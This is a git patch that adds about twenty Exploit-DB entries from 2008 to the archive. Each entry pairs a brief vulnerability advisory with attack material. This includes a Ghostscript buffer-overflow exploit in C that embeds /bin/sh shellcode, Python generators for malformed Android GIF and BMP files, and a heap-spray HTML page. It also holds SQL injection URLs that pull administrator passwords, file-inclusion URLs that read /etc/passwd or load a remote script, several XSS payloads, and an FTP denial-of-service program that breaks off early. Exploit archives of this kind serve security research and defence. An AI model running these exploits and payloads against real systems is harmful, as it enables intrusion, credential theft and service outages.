From 890c9015815037ac85bcd3df9e503a77664d760d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sun, 2 Feb 2014 04:25:24 +0000
Subject: [PATCH] Updated 02_02_2014

---
 files.csv                           |  21 +++++
 platforms/asp/webapps/31314.txt     |   9 ++
 platforms/cgi/webapps/31313.txt     |  10 +++
 platforms/hardware/dos/31306.txt    |  11 +++
 platforms/hardware/dos/31307.py     |  32 +++++++
 platforms/hardware/dos/31308.html   |  58 +++++++++++++
 platforms/hardware/remote/31311.txt |  32 +++++++
 platforms/linux/remote/31309.c      | 129 ++++++++++++++++++++++++++++
 platforms/php/webapps/31312.txt     |   9 ++
 platforms/php/webapps/31315.txt     |   9 ++
 platforms/php/webapps/31316.txt     |   9 ++
 platforms/php/webapps/31317.txt     |   9 ++
 platforms/php/webapps/31318.txt     |  11 +++
 platforms/php/webapps/31319.txt     |   9 ++
 platforms/php/webapps/31320.txt     |   9 ++
 platforms/php/webapps/31321.txt     |   7 ++
 platforms/php/webapps/31322.txt     |   9 ++
 platforms/php/webapps/31324.txt     |   9 ++
 platforms/php/webapps/31325.txt     |   9 ++
 platforms/php/webapps/31326.txt     |   9 ++
 platforms/php/webapps/31328.txt     |  12 +++
 platforms/windows/dos/31323.c       | 118 +++++++++++++++++++++++++
 22 files changed, 540 insertions(+)
 create mode 100755 platforms/asp/webapps/31314.txt
 create mode 100755 platforms/cgi/webapps/31313.txt
 create mode 100755 platforms/hardware/dos/31306.txt
 create mode 100755 platforms/hardware/dos/31307.py
 create mode 100755 platforms/hardware/dos/31308.html
 create mode 100755 platforms/hardware/remote/31311.txt
 create mode 100755 platforms/linux/remote/31309.c
 create mode 100755 platforms/php/webapps/31312.txt
 create mode 100755 platforms/php/webapps/31315.txt
 create mode 100755 platforms/php/webapps/31316.txt
 create mode 100755 platforms/php/webapps/31317.txt
 create mode 100755 platforms/php/webapps/31318.txt
 create mode 100755 platforms/php/webapps/31319.txt
 create mode 100755 platforms/php/webapps/31320.txt
 create mode 100755 platforms/php/webapps/31321.txt
 create mode 100755 platforms/php/webapps/31322.txt
 create mode 100755 platforms/php/webapps/31324.txt
 create mode 100755 platforms/php/webapps/31325.txt
 create mode 100755 platforms/php/webapps/31326.txt
 create mode 100755 platforms/php/webapps/31328.txt
 create mode 100755 platforms/windows/dos/31323.c

diff --git a/files.csv b/files.csv
index 49f6f0b24..fcf14d17e 100755
--- a/files.csv
+++ b/files.csv
@@ -28114,3 +28114,24 @@ id,file,description,date,author,platform,type,port
 31303,platforms/php/webapps/31303.txt,"Joomla! and Mambo 'com_inter' Component 'id' Parameter SQL Injection Vulnerability",2008-02-25,The-0utl4w,php,webapps,0
 31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 'manager/xmedia.php' Cross-Site Scripting Vulnerability",2008-02-21,"Omer Singer",php,webapps,0
 31305,platforms/linux/dos/31305.c,"Linux 3.4+ recvmmsg x32 compat Proof of Concept",2014-01-31,"Kees Cook",linux,dos,0
+31306,platforms/hardware/dos/31306.txt,"Nortel UNIStim IP Phone Remote Ping Denial of Service Vulnerability",2008-02-26,sipherr,hardware,dos,0
+31307,platforms/hardware/dos/31307.py,"Android Web Browser GIF File Heap-Based Buffer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",hardware,dos,0
+31308,platforms/hardware/dos/31308.html,"Android Web Browser BMP File Integer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",hardware,dos,0
+31309,platforms/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 zseticcspace() Function Buffer Overflow Vulnerability",2008-02-27,"Will Drewry",linux,remote,0
+31311,platforms/hardware/remote/31311.txt,"Juniper Networks Secure Access 2000 'rdremediate.cgi' Cross Site Scripting Vulnerability",2008-02-28,"Richard Brain",hardware,remote,0
+31312,platforms/php/webapps/31312.txt,"Barryvan Compo Manager 0.3 'main.php' Remote File Include Vulnerability",2008-02-28,MhZ91,php,webapps,0
+31313,platforms/cgi/webapps/31313.txt,"Juniper Networks Secure Access 2000 Web Root Path Disclosure Vulnerability",2008-02-28,"Richard Brain",cgi,webapps,0
+31314,platforms/asp/webapps/31314.txt,"Flicks Software AuthentiX 6.3b1 'username' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"William Hicks",asp,webapps,0
+31315,platforms/php/webapps/31315.txt,"XRMS 1.99.2 CRM 'msg' Parameter Cross Site Scripting Vulnerability",2008-02-28,vijayv,php,webapps,0
+31316,platforms/php/webapps/31316.txt,"Centreon 1.4.2 color_picker.php Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"Julien CAYSSOL",php,webapps,0
+31317,platforms/php/webapps/31317.txt,"netOffice Dwins 1.3 Authentication Bypass Vulnerability and Arbitrary File Upload Vulnerability",2008-02-29,RawSecurity.org,php,webapps,0
+31318,platforms/php/webapps/31318.txt,"Centreon 1.4.2.3 index.php Local File Include Vulnerability",2008-02-29,JosS,php,webapps,0
+31319,platforms/php/webapps/31319.txt,"Simple PHP Scripts gallery 0.x index.php Cross-Site Scripting Vulnerability",2008-02-29,ZoRLu,php,webapps,0
+31320,platforms/php/webapps/31320.txt,"phpMyTourney 2 tourney/index.php Remote File Include Vulnerability",2008-02-29,"HACKERS PAL",php,webapps,0
+31321,platforms/php/webapps/31321.txt,"Heathco Software h2desk Multiple Information Disclosure Vulnerabilities",2008-03-01,joseph.giron13,php,webapps,0
+31322,platforms/php/webapps/31322.txt,"PHP-Nuke Johannes Hass 'gaestebuch 2.2 Module 'id' Parameter SQL Injection Vulnerability",2008-03-01,TurkishWarriorr,php,webapps,0
+31323,platforms/windows/dos/31323.c,"ADI Convergence Galaxy FTP Server Password Remote Denial of Service Vulnerability",2008-03-01,"Maks M",windows,dos,0
+31324,platforms/php/webapps/31324.txt,"KC Wiki 1.0 minimal/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0
+31325,platforms/php/webapps/31325.txt,"KC Wiki 1.0 simplest/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0
+31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 Information Disclosure, HTML Injection, and Cross-Site Scripting Vulnerabilities",2008-03-03,"Digital Security Research Group",php,webapps,0
+31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 'msg' Parameter HTML Injection Vulnerability",2008-03-03,Dominus,php,webapps,0
diff --git a/platforms/asp/webapps/31314.txt b/platforms/asp/webapps/31314.txt
new file mode 100755
index 000000000..cba398a94
--- /dev/null
+++ b/platforms/asp/webapps/31314.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28040/info
+
+Flicks Software AuthentiX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+AuthentiX 6.3b1 Trial Version is vulnerable; other versions may also be affected. 
+
+https://www.example.com/aspAdmin/editUser.asp?username=%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;%20URL=http://www.example2.com/%22%3E 
\ No newline at end of file
diff --git a/platforms/cgi/webapps/31313.txt b/platforms/cgi/webapps/31313.txt
new file mode 100755
index 000000000..901ea9292
--- /dev/null
+++ b/platforms/cgi/webapps/31313.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28037/info
+
+Juniper Networks Secure Access 2000 is prone to a path-disclosure vulnerability.
+
+Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks.
+
+Secure Access 2000 5.5R1 Build 11711 is vulnerable; other versions may also be affected. 
+
+https://www.example.com/dana-na/auth/remediate.cgi?action=&step=preauth
+https://www.example.com/dana-na/auth/remediate.cgi?step=preauth 
\ No newline at end of file
diff --git a/platforms/hardware/dos/31306.txt b/platforms/hardware/dos/31306.txt
new file mode 100755
index 000000000..286097187
--- /dev/null
+++ b/platforms/hardware/dos/31306.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28004/info
+
+Nortel UNIStim IP Phone products are prone to a remote denial-of-service vulnerability because the software fails to properly handle unexpected network datagrams.
+
+Successfully exploiting this issue allows remote attackers to crash affected phones, denying service to legitimate users.
+
+Phones with firmware 0604DAS are vulnerable to this issue. Other versions are also reportedly affected, but we don't know which specific versions. 
+
+The following command will demonstrate this issue:
+
+ping -s 65500 <target> 
\ No newline at end of file
diff --git a/platforms/hardware/dos/31307.py b/platforms/hardware/dos/31307.py
new file mode 100755
index 000000000..0bd832ca6
--- /dev/null
+++ b/platforms/hardware/dos/31307.py
@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/28005/info
+
+Android Web Browser is prone to a heap-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.
+
+Successfully exploiting this vulnerability can allow remote attackers to execute arbitrary machine code in the context of the application. Failed attempts will likely result in denial-of-service conditions.
+
+This issue affects Android SDK m3-rc37a and earlier.
+
+##Android Heap Overflow
+##Ortega Alfredo _ Core Security Exploit Writers Team
+##tested against Android SDK m3-rc37a
+
+import Image
+import struct
+
+#Creates a _good_ gif image
+imagename='overflow.gif'
+str = '\x00\x00\x00\x00'*30000
+im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1)
+im.save(imagename,'GIF')
+
+#Shrink the Logical screen dimension
+SWidth=1
+SHeight=1
+
+img = open(imagename,'rb').read()
+img = img[:6]+struct.pack('<HH',SWidth,SHeight)+img[10:]
+
+#Save the _bad_ gif image
+q=open(imagename,'wb=""')
+q.write(img)
+q.close()
diff --git a/platforms/hardware/dos/31308.html b/platforms/hardware/dos/31308.html
new file mode 100755
index 000000000..e39a4db95
--- /dev/null
+++ b/platforms/hardware/dos/31308.html
@@ -0,0 +1,58 @@
+source: http://www.securityfocus.com/bid/28006/info
+
+Android Web Browser is prone to an integer-overflow vulnerability because it fails to adequately handle user-supplied data.
+
+Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will likely cause denial-of-service conditions.
+
+This issue affects Android SDK m5-rc14 and earlier. 
+
+# This script generates a Bitmap file that makes the Android browser
+jump to the address at 0xffffff+0x10
+# Must be loaded inside a HTML file with a tag like this: <IMG
+src=badbmp.bmp>
+# Alfredo Ortega - Core Security
+import struct
+
+offset = 0xffef0000
+width = 0x0bffff
+height=8
+
+bmp ="\x42\x4d\xff\x00\x00\x00\x00\x00\x00\x00"
+bmp+=struct.pack("<I",offset)
+bmp+="\x28\x00\x00\x00"
+bmp+=struct.pack("<I",width)
+bmp+=struct.pack("<I",height)
+bmp+="\x03\x00\x08\x00\x00\x00"
+bmp+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+bmp+="\x00\x00\x00\x00\x00\x00\x00\x55\x02\xff\x00\x02\x00\x02\x02\xff"
+bmp+="\xff\x11\xff\x33\xff\x55\xff\x66\xff\x77\xff\x88\x41\x41\x41\x41"
+bmp+="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+bmp+="\x41\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
+bmp+="\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
+open("badbmp.bmp","wb").write(bmp)
+
+The complete exploit page follows:
+
+
+<HTML>
+<HEAD>
+</HEAD>
+<BODY>
+<script type="text/javascript">
+// Fill 0x200000 - 0xa00000 with Breakpoints
+var nop = unescape("%u0001%uef9f");
+while (nop.length <= 0x100000/2) nop += nop;
+var i = 0;
+for (i = 0;i<5;i++)
+  document.write(nop)
+
+// Fill 0xa00000 - 0x1100000 with address 0x00400040
+var nop = unescape("%u4000%u4000");
+while (nop.length <= 0x100000/2) nop += nop;
+var i = 0;
+for (i = 0;i<2;i++)
+  document.write(nop)
+</script>
+<IMG src=badbmp.bmp>
+</BODY>
+</HTML>
\ No newline at end of file
diff --git a/platforms/hardware/remote/31311.txt b/platforms/hardware/remote/31311.txt
new file mode 100755
index 000000000..27745c34f
--- /dev/null
+++ b/platforms/hardware/remote/31311.txt
@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/28034/info
+
+Juniper Networks Secure Access 2000 is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Juniper Networks Secure Access 2000 5.5R1 Build 11711 is vulnerable; other versions may also be affected. 
+
+https://www.example.com/dana-na/auth/rdremediate.cgi?delivery_mode=</APPLET><SCRIPT>alert(&#039;Can%20Cross%20Site%20Attack&#039;)</SCRIPT>&action=tryagain&signinId=url_default
+
+COMPLETE HTTP REQUEST:
+
+GET
+/dana-na/auth/rdremediate.cgi?delivery_mode=</APPLET><SCRIPT>alert(&#039;Can%20Cross%20Site%20Attack&#039;)</SCRIPT>&action=tryagain&signinId=url_default
+HTTP/1.1
+User-Agent: curl/7.15.4 (i486-pc-linux-gnu) libcurl/7.15.4
+OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.3
+Host: target-domain.foo
+Accept: */*
+[CRLF]
+[CRLF]
+
+
+PARTIAL HTTP RESPONSE:
+
+<title></title>
+
+[SNIP]
+
+<APPLET id=NeoterisSetup > Unknown deliver mode
+</APPLET><SCRIPT>alert(&#039;Can Cross Site Attack&#039;)</SCRIPT>
+<PARAM NAME="Parameter0" VALUE="action=tryagain"></APPLET>
diff --git a/platforms/linux/remote/31309.c b/platforms/linux/remote/31309.c
new file mode 100755
index 000000000..2f2f4f180
--- /dev/null
+++ b/platforms/linux/remote/31309.c
@@ -0,0 +1,129 @@
+source: http://www.securityfocus.com/bid/28017/info
+
+Ghostscript is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions. 
+
+/* A proof of concept exploit for ghostscript 8.61 and earlier.
+ *
+ * Vulnerability discovered by Chris Evans <cevans@google.com>
+ * Author: wad@google.com (Will Drewry)
+ *
+ * Affects: All versions of ghostscript that support .seticcspace.
+ * Tested on: Ubuntu gs-esp-8.15.2.dfsg.0ubuntu1-0ubuntu1 (x86)
+ *            Ghostscript 8.61 (2007-11-21) (x86)
+ *
+ * Discussion:
+ *
+ * The vulnerability is in the float vector handling in the seticcspace
+ * function. zicc.c:seticcspace() allows the user to set the number of
+ * expected float values (ncomps) in a vector (range_buff).  However,
+ * this vector is statically allocated with the maximum space of 8
+ * floats.  Despite this, the call (dict_floats_array_check_param) to
+ * populate the array of floats is passed a maximum size of ncomps*2.  A
+ * large payload will result in overflowing this array.  Since all the
+ * values are read in as single precision floating point values, the
+ * payload must be encoded as floats.
+ *
+ * This exploit encodes a basic metasploit-generated exec(/bin/sh) chunk
+ * of shellcode as a list of floats and prepends the address to a "jmp
+ * *%esp" in the /usr/bin/gs.
+ *
+ * This was tested on gs-esp-8.15.2.dfsg.0ubuntu1-0ubuntu1 package in
+ * Ubuntu (on a 32-bit-only kernel)  and versions up to 8.61
+ * (2007-11-21) on other distributions.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+unsigned char shellcode[] =
+"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00"
+"\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f\x62\x69"
+"\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd\x80";
+unsigned char sledpad[] = "\x90\x90\x90"; // maximum sledpad needed
+unsigned char spacepad[] = "\x41\x41\x41\x41"; // indicator for fun dumps
+
+float bytes_to_float(unsigned char *bytes) {
+  float f = 0.0f;
+  memcpy((void *)&f, bytes, sizeof(float));
+  return f;
+}
+
+unsigned char *build_attack(size_t *attack_size, long a, int padding) {
+  size_t float_size = sizeof(float);
+  size_t shellcode_size = sizeof(shellcode) - 1;
+  size_t sledpad_size = float_size - (shellcode_size % float_size);
+  size_t pad_size = padding * (sizeof(spacepad) - 1);
+  unsigned char *attack = NULL, *padded_shellcode = shellcode;
+  int i,j;
+
+  // allocate attack space
+  *attack_size = shellcode_size + sledpad_size + sizeof(a) + pad_size;
+  if (*attack_size) attack = malloc(*attack_size);
+  if (attack == NULL) exit(1);
+
+  fprintf(stderr, "sizeof(float) = %d\n", float_size);
+  fprintf(stderr, "sledpad_size = %d\n", sledpad_size);
+  fprintf(stderr, "pad_size = %d\n", pad_size);
+  fprintf(stderr, "attack_size = %d\n", *attack_size);
+  fprintf(stderr, "address = %p\n", a);
+
+  // write out request space padding
+  for (i = 0; i < pad_size; i += sizeof(spacepad)-1)
+    memcpy(&attack[i], spacepad, sizeof(spacepad)-1);
+
+  // write out the address to a "jmp *%esp"
+  memcpy(&attack[i], (void *)&a, sizeof(long));
+  i += sizeof(long);
+
+  // pad to ensure that shellcode is divisible by sizeof(float)
+  if (sledpad_size != float_size){
+    // build a padded a shellcode
+    padded_shellcode = malloc(shellcode_size+sledpad_size);
+    if (padded_shellcode == NULL) exit(1);
+    memcpy(padded_shellcode, sledpad, sledpad_size);
+    memcpy(padded_shellcode+sledpad_size, shellcode, shellcode_size);
+    shellcode_size += sledpad_size;
+  }
+
+  // Copy in the padded shellcode
+  memcpy(&attack[i], padded_shellcode, shellcode_size);
+
+  if (shellcode != padded_shellcode) free(padded_shellcode);
+  // That's it.
+  return attack;
+}
+
+int main(int argc, char **argv) {
+  size_t i = 0;
+  size_t attack_size = 0;
+  unsigned char *attack = NULL;
+  // location of jmp *esp in the binary
+  long address = 0x0;
+
+
+  if (argc != 3){
+    fprintf(stderr, "Usage: %s <pad count> <addr of jmp *%%esp>\n", argv[0]);
+    fprintf(stderr, "       e.g. %s 15 $((0x8744eff))\n", argv[0]);
+    fprintf(stderr, "An address can be acquired with:\n");
+    fprintf(stderr, "  objdump -D /usr/bin/gs | grep 'jmp[ \\t]\\+\\*%%esp'\n");
+    return 1;
+  }
+
+  attack = build_attack(&attack_size, atol(argv[2]), atoi(argv[1]));
+
+  // output the bad PS
+  printf(
+    "%!PS-Adobe-2.0\n\n"
+    "<< /DataSource currentfile /N 100 /Range [ ");
+  // convert the attack to floats
+  for(i = 0; i <= attack_size - sizeof(float); i += sizeof(float))
+    printf("%.9g ",  bytes_to_float(attack+i));
+  printf(" ]  >> .seticcspace\n");
+
+  free(attack);
+  return 0;
+}
diff --git a/platforms/php/webapps/31312.txt b/platforms/php/webapps/31312.txt
new file mode 100755
index 000000000..d7f859355
--- /dev/null
+++ b/platforms/php/webapps/31312.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28035/info
+
+Barryvan Compo Manager is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
+
+This issue affects Barryvan Compo Manager 0.3; other versions may also be vulnerable. 
+
+http://www.example.com/main.php?pageURL=[Evil_Code] 
\ No newline at end of file
diff --git a/platforms/php/webapps/31315.txt b/platforms/php/webapps/31315.txt
new file mode 100755
index 000000000..85b2cd3d7
--- /dev/null
+++ b/platforms/php/webapps/31315.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28041/info
+
+XRMS CRM is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+XRMS CRM 1.99.2 is affected; other versions may also be vulnerable. 
+
+http://www.example.com//xrms/admin/users/self.php?msg=Preferences%20successfully%20saved&msg=<script>alert("xss");</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/31316.txt b/platforms/php/webapps/31316.txt
new file mode 100755
index 000000000..0ca0b1198
--- /dev/null
+++ b/platforms/php/webapps/31316.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28043/info
+
+Centreon is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Centreon 1.4.2.2 and 1.4.2.3 are vulnerable; other versions may also be affected.
+
+http://www.example.com//include/common/javascript/color_picker.php?&name=XSS&title=%3Cscript%3Ea=/Test%20XSS/;alert(a.source)%3C/script%3E 
\ No newline at end of file
diff --git a/platforms/php/webapps/31317.txt b/platforms/php/webapps/31317.txt
new file mode 100755
index 000000000..65d78ee90
--- /dev/null
+++ b/platforms/php/webapps/31317.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28051/info
+
+netOffice Dwins is prone to a vulnerability that allows attackers to bypass authentication as well as a vulnerability that allows attackers to upload arbitrary files. These issues occur because the application fails to adequately sanitize user-supplied input.
+
+Attackers can leverage these issues to gain unauthorized access to the application and to execute arbitrary code in the context of the application.
+
+These issues affect Dwins 1.3 p2; other versions may also be affected. 
+
+<form accept-charset="UNKNOWN" method="POST" action="http://www.example.com/netoffice/projects_site/uploadfile.php?demoSession=1&allowPhp=true&action=add&project=&task=#filedetailsAnchor" name="feeedback" enctype="multipart/form-data"> <input type="hidden" name="MAX_FILE_SIZE" value="100000000"><input type="hidden" name="maxCustom" value=""> <table cellpadding="3" cellspacing="0" border="0"> <tr><th colspan="2">Upload Form</th></tr> <tr><th>Comments :</th><td><textarea cols="60" name="commentsField" rows="6">&lt;/textarea&gt;</td></tr> <tr><th>Upload :</th><td><input size="35" value="" name="upload" type="file"></td></tr> <tr><th>&nbsp;</th><td><input name="submit" type="submit" value="Save"><br><br></td></tr></table> </form>
\ No newline at end of file
diff --git a/platforms/php/webapps/31318.txt b/platforms/php/webapps/31318.txt
new file mode 100755
index 000000000..81a032767
--- /dev/null
+++ b/platforms/php/webapps/31318.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28052/info
+
+Centreon is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to obtain potentially sensitive information that may lead to further attacks.
+
+This issue affects Centreon 1.4.2.3; other versions may also be vulnerable.
+
+http://www.example.com/include/doc/index.php?page=../../www/oreon.conf.php
+http://www.example.com/include/doc/index.php?page=../../../../../etc/passwd
+http://www.example.com/include/doc/index.php?page=[Local File] 
\ No newline at end of file
diff --git a/platforms/php/webapps/31319.txt b/platforms/php/webapps/31319.txt
new file mode 100755
index 000000000..a93c93425
--- /dev/null
+++ b/platforms/php/webapps/31319.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28056/info
+
+Simple PHP Scripts 'gallery' is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects 'gallery' 0.1, 0.3, and 0.4; other versions may also be affected.
+
+http://www.example.com/index.php?gallery=XSS 
\ No newline at end of file
diff --git a/platforms/php/webapps/31320.txt b/platforms/php/webapps/31320.txt
new file mode 100755
index 000000000..2bba561a4
--- /dev/null
+++ b/platforms/php/webapps/31320.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28057/info
+
+phpMyTourney is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
+
+This issue affects phpMyTourney 2; other versions may also be vulnerable.
+
+http://www.example.com/phpmytourney/sources/tourney/index.php?page=[Evil-Script] 
\ No newline at end of file
diff --git a/platforms/php/webapps/31321.txt b/platforms/php/webapps/31321.txt
new file mode 100755
index 000000000..01a89ea14
--- /dev/null
+++ b/platforms/php/webapps/31321.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28062/info
+
+Heathco Software h2desk is prone to multiple information-disclosure vulnerabilities.
+
+Attackers can leverage these issues to obtain potentially sensitive information that can aid in further attacks.
+
+http://www.example.com/index.php?pid=databasedump 
\ No newline at end of file
diff --git a/platforms/php/webapps/31322.txt b/platforms/php/webapps/31322.txt
new file mode 100755
index 000000000..f360cd1a9
--- /dev/null
+++ b/platforms/php/webapps/31322.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28063/info
+
+The 'gaestebuch' module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects gaestebuch 2.2; other versions may also be affected. 
+
+http://www.example.com/modules.php?name=gaestebuch_v22&amp;func=edit&amp;id=-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1 
\ No newline at end of file
diff --git a/platforms/php/webapps/31324.txt b/platforms/php/webapps/31324.txt
new file mode 100755
index 000000000..52f1862a7
--- /dev/null
+++ b/platforms/php/webapps/31324.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28074/info
+
+KC Wiki is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
+
+KC Wiki 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/kcwiki-1_0-20051129/minimal/wiki.php?page=http://www.example2.com/cmd.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/31325.txt b/platforms/php/webapps/31325.txt
new file mode 100755
index 000000000..2c02e1bc6
--- /dev/null
+++ b/platforms/php/webapps/31325.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28074/info
+ 
+KC Wiki is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
+ 
+KC Wiki 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/kcwiki-1_0-20051129/simplest/wiki.php?page=http://www.example2.com/cmd.txt? 
\ No newline at end of file
diff --git a/platforms/php/webapps/31326.txt b/platforms/php/webapps/31326.txt
new file mode 100755
index 000000000..111cdb368
--- /dev/null
+++ b/platforms/php/webapps/31326.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28076/info
+
+Flyspray is prone to an information-disclosure issue, an HTML-injection issue, and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues determine valid usernames and passwords via brute-force attacks or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and launch other attacks.
+
+These issues affect Flyspray 0.9.9 to 0.9.9.4.
+
+http://www.example.com/index.php?do=myprofile&tasks_perpage=<script>alert('DSecRG XSS')</script> http://www.example.com/index.php?do=myprofile&time_zone=<img src="javascript:alert('DSecRG XSS')"> http://www.example.com/index.php?do=admin&area=newproject&anon_open=<img src="javascript:alert('DSecRG XSS')"> http://www.example.com/index.php?do=admin&area=cat&rgt[4]=<script>alert('DSecRG XSS')</script> http://www.example.com/index.php?do=pm&area=prefs&project_is_active=<img src="javascript:alert('DSecRG XSS')"> http://www.example.com/index.php?do=details&project_id=<script>alert('DSecRG XSS')</script> http://www.example.com/index.php?do=details&item_status=<img src="javascript:alert('DSecRG XSS')"> http://www.example.com/index.php?do=details&item_summary=<script>alert('DSecRG XSS')</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/31328.txt b/platforms/php/webapps/31328.txt
new file mode 100755
index 000000000..86296a92c
--- /dev/null
+++ b/platforms/php/webapps/31328.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/28082/info
+
+
+TorrentTrader is prone to an HTML-injection vulnerability because it fails to adequately sanitize user-supplied input.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+NOTE: This BID was previously titled 'TorrentTrader 'msg' Parameter Cross Site Scripting Vulnerability'. Following further analysis, the title and multiple details throughout have been changed to better document the issue.
+
+TorrentTrader Classic 1.08 is affected; other versions may also be vulnerable.
+
+http://www.example.com/account-inbox.php?msg=<script>alert(document.co­okie)</script>&receiver=<username> 
\ No newline at end of file
diff --git a/platforms/windows/dos/31323.c b/platforms/windows/dos/31323.c
new file mode 100755
index 000000000..8caab2c94
--- /dev/null
+++ b/platforms/windows/dos/31323.c
@@ -0,0 +1,118 @@
+source: http://www.securityfocus.com/bid/28066/info
+
+ADI Convergence Galaxy FTP Server is prone to a denial-of-service vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Given the nature of this issue, remote code execution may also be possible, but this has not been confirmed.
+
+ADI Convergence Galaxy FTP Server 0.1 is vulnerable; other versions may also be affected. 
+
+#include <sys/types.h> 
+#include <sys/socket.h> 
+#include <netinet/in.h> 
+#include <arpa/inet.h> 
+#include <netdb.h> 
+#include <stdio.h> 
+#include <unistd.h> 
+#include <string.h> 
+
+int port=21; 
+struct hostent *he; 
